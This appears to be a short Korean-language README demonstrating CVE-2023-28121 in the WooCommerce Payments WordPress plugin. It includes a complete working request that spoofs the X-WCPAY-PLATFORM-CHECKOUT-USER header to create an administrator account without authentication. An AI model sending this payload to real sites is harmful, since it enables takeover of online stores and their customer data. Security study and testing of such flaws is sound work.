
WooCommerce Payments 플러그인을 사용한 WordPress의 중대한 취약점 실제 악용
WooCommerce Payments 플러그인을 사용한 WordPress의 심각한 취약점 실습적 탐구
CVE-2023-28121은 REST API를 통해 인증 없이 관리자 사용자를 생성할 수 있습니다.
📊 영향을 받은 플러그인은 수십만 개의 설치를 보유하고 있으며, 전자상거래에서 널리 사용됩니다.
https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44
시스템은 조작 가능한 헤더를 허용합니다:
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
이를 통해 유효한 인증 없이 높은 권한을 가진 사용자 생성을 위한 요청을 보낼 수 있습니다.
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
{
"username": "hacked",
"password": "StrongPass123!",
"email": "[email protected]",
"roles": ["administrator"]
}
✔️ 결과: 관리자 사용자 생성
/wp-admin 패널 접근👨💻 저자
Luis Eduardo .M.B.S.R
펜테스터 / 웹 보안
LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/
GitHub: https://github.com/luisdevpentest
통제된 환경에서의 교육적 용도. 본 지식이 타인에 의해 어떻게 사용되는지에 대해 책임을 지지 않습니다.